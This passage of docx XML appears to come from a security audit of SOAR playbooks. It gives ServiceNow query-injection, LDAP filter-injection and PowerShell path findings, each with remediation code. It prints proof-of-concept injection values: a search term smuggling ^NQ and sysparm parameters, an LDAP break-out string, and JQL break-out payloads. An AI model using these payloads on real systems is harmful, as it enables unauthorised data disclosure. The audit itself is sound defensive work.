          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>work_notes</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^NQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to start a new unrelated query returning records outside the intended 30-day/table scope). Impact is over-broad data retrieval from ServiceNow with the automation user's rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search_term</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a user/host/entity value from the artifact. Source -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>space_delimiter_input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run_ticket_query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (read/disclosure; depends on connector URL-encoding - but the template deliberately injects URL params itself, so the connector is clearly expected to pass them through). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_snow.py</w:t>
      </w:r>
      <w:r>
        <w:t>, real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>search_term = "jdoe^NQactive=true^ORDERBYDESCsys_created_on&amp;sysparm_limit=10000&amp;sysparm_fields=number,description,comments,work_notes"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>query -&gt; "sysparm_query=active=true^IR_OR_QUERY=jdoe^NQactive=true^ORDERBYDESCsys_created_on&amp;sysparm_limit=10000&amp;sysparm_fields=number,description,comments,work_notes\n^opened_at&gt;javascript:gs.dateGenerate('2026-09-06','00:00:00')&amp;sysparm_display_value=true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The injected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^NQ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and extra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysparm_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameters are now in the query string. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: strip/deny encoded-query and URL metacharacters from the term, and pass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysparm_limit</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysparm_fields</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only as separate structured parameters, never concatenated:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def snow_sanitize(t):</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return re.sub(r'[\^&amp;=\n\r]', ' ', t or '')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># build the IR_OR_QUERY value only from sanitised terms; keep URL params out of the user-controlled string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-05 note (Jira, positive):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Jira_Related_Tickets_Search.py:448-467</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> escapes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\ \t \n \r " '</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before JQL and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:496,513</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quotes the term. PoC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_jira.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with break-out payloads (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>x""") OR reporter = currentUser() OR text ~ "</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) produced a fully-escaped </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>text ~ "\"...\""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> clause - the injected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OR reporter = currentUser()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stayed inside the quoted literal. JQL handling here is sound; the ServiceNow sibling should adopt the same pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection); CWE-88 Improper Neutralization of Argument Delimiters in a Command (Argument Injection). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1213. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-04 — LDAP filter injection in AD LDAP Entity Attribute Lookup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 4.2). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/AD_LDAP_Entity_Attribute_Lookup.py:211-216,361-366,552</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>552  template = """%%\n(&amp;(objectCategory=computer)(|(sAMAccountName={0}*)(distinguishedName={0}*)(userPrincipalName={0}*)))\n%%"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>555  parameters = ["filtered-data:playbook_inputs_filter:condition_2:playbook_input:device"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The device string and the group distinguished-names are interpolated into LDAP search filters with no RFC 4515 escaping. LDAP metacharacters </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>( ) * \ |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> let an attacker alter the filter logic - broaden the match with extra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, inject parenthesised sub-clauses, or (with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plus a new clause) change what objects/attributes are returned. Impact is limited to enrichment reads (the connector's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>get attributes</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), so this is information-exposure / result-manipulation rather than a destructive sink. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is an artifact field; group DNs are second-order (returned by AD then re-queried). Source -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (read-only impact; depends on the AD LDAP connector not re-escaping). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_ldap.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, real output) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>device = "*)(objectCategory=*"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> produced:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>filter: "\n(&amp;(objectCategory=computer)(|(sAMAccountName=*)(objectCategory=**)(distinguishedName=*)(objectCategory=**)(userPrincipalName=*)(objectCategory=**)))\n"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The injected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>)(objectCategory=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> closes the per-attribute clause and adds predicates; the trailing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wildcards broaden every match. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: escape per RFC 4515 before templating:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def ldap_escape(v):</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return (v or '').replace('\\','\\5c').replace('*','\\2a').replace('(','\\28').replace(')','\\29').replace('\x00','\\00')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dev = ldap_escape(device_value)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>filt = f"(&amp;(objectCategory=computer)(|(sAMAccountName={dev}*)(distinguishedName={dev}*)(userPrincipalName={dev}*)))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Escaping the five special characters keeps the wildcard behaviour intended by the trailing literal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> while making attacker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-90 Improper Neutralization of Special Elements used in an LDAP Query (LDAP Injection); CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1087 Account Discovery. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-15 — Hostname interpolated into PowerShell file paths in internal_host_winrm_investigate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 4.4). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/internal_host_winrm_investigate.py:154,287,318</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">template </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.\{0}-SOARFetch-*.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:287</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>format_zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:318</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>format_file_removal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The hostname is substituted into PowerShell file paths in the data collection / zip / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Remove-Item .\{0}-SOARFetch*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scripts run via WinRM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Unlike PB2-03 these are static collection scripts, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is still attacker hostname and could manipulate the written/removed filename pattern (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Remove-Item .\X-SOARFetch*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a crafted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could widen the glob). Lower impact than the respond pack but same root cause (no quoting). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
